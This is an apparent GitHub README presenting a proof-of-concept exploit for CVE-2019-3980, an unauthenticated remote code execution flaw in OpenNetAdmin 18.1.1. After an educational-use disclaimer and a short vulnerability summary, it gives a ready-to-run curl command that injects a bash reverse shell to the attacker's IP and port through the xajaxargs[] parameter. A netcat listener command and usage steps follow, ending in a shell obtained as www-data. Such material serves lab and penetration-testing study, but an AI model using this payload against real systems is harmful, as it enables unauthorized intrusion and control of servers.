# CVE-2019-3980 – OpenNetAdmin 18.1.1 Remote Code Execution
> ⚠️ **Disclaimer**
This repository is intended **strictly for educational and research purposes only**.
The information and code provided here can be used in **controlled environments**, such as private lab machines.
**Unauthorized use of this code against systems you do not own or have explicit permission to test is illegal and unethical.**
The author is **not responsible** for any misuse or damages caused.
---
## 🔍 About the Vulnerability
A Remote Code Execution vulnerability exists in **OpenNetAdmin 18.1.1** via the `xajax` AJAX request interface.
The vulnerability arises from improper input sanitization, allowing command injection via a crafted POST request to `/ona/`.
This exploit leverages the `tooltips` plugin to trigger a reverse shell back to the attacker's listener.
- **CVE ID:** CVE-2019-3980
- **Exploit-DB ID:** [47691](https://www.exploit-db.com/exploits/47691)
- **Vulnerable Application:** OpenNetAdmin 18.1.1
- **Affected Parameter:** `xajaxargs[]`
- **Impact:** Remote Code Execution
- **Authentication Required:** ❌ No
- **Network Access Required:** ✅ Yes
---
## 📂 Exploit Overview
- **Exploit Type:** Command Injection → Reverse Shell
- **Exploit Title:** OpenNetAdmin 18.1.1 – Unauthenticated RCE
- **ExploitDB ID:** 47691
- **Language:** Bash (via `curl`)
- **Authentication Required:** ❌ No
---
## ⚙️ Exploit Code
This customized Bash one-liner sends a POST request to the vulnerable `xajax=window_submit` endpoint with injected reverse shell code.
```bash
#!/bin/bash
curl --silent -d "xajax=window_submit&xajaxr=1574117726710&xajaxargs[]=tooltips&xajaxargs[]=ip%3D%3E;echo \"BEGIN\";bash%20-c%20%22bash%20-i%20%3E%26%20%2Fdev%2Ftcp%2F<YOUR-IP>%2F<YOUR-PORT>%200%3E%261%22;echo \"END\"&xajaxargs[]=ping" "http://<TARGET-IP>/ona/" | sed -n -e '/BEGIN/,/END/ p' | tail -n +2 | head -n -1
```
> 🛠️ **Note:**
Replace `<YOUR-IP>` and `<YOUR-PORT>` with your Netcat listener IP and port.
Start your listener using:
```bash
nc -nlvp <PORT>
```
---
## 🎯 Demonstration
### 1. Showing the ONA Web Page and Version
> Screenshot of the vulnerable OpenNetAdmin interface and version.
---
## 🚀 Exploit Usage
### 2. Ran the Exploit
```bash
bash shell.sh
```
> Screenshot of the script execution triggering the payload.
---
## 🐚 Reverse Shell
### 3. Reverse Shell Obtained
```bash
nc -nlvp <PORT>
```
> Reverse shell caught as `www-data`.
---
## 📚 References
- [Exploit-DB: CVE-2019-3980](https://www.exploit-db.com/exploits/47691)
- [NVD CVE Info](https://nvd.nist.gov/vuln/detail/CVE-2019-3980)
---
## 📝 Medium Blog
Check out the detailed walkthrough and theory on my Medium post:
👉 **[Read the blog on Medium](https://medium.com/@cyberquestor/opennetadmin-18-1-1-remote-code-execution-exploit-db-47691-7c25c9b0ea68)**
[4.0K] /data/pocs/ffef9744084a44a095d31e7acf0bf9ddc299a43e
├── [4.0K] img
│ ├── [ 49K] exploit.png
│ ├── [139K] ona.png
│ └── [ 76K] shell.png
└── [3.0K] README.md
1 directory, 4 files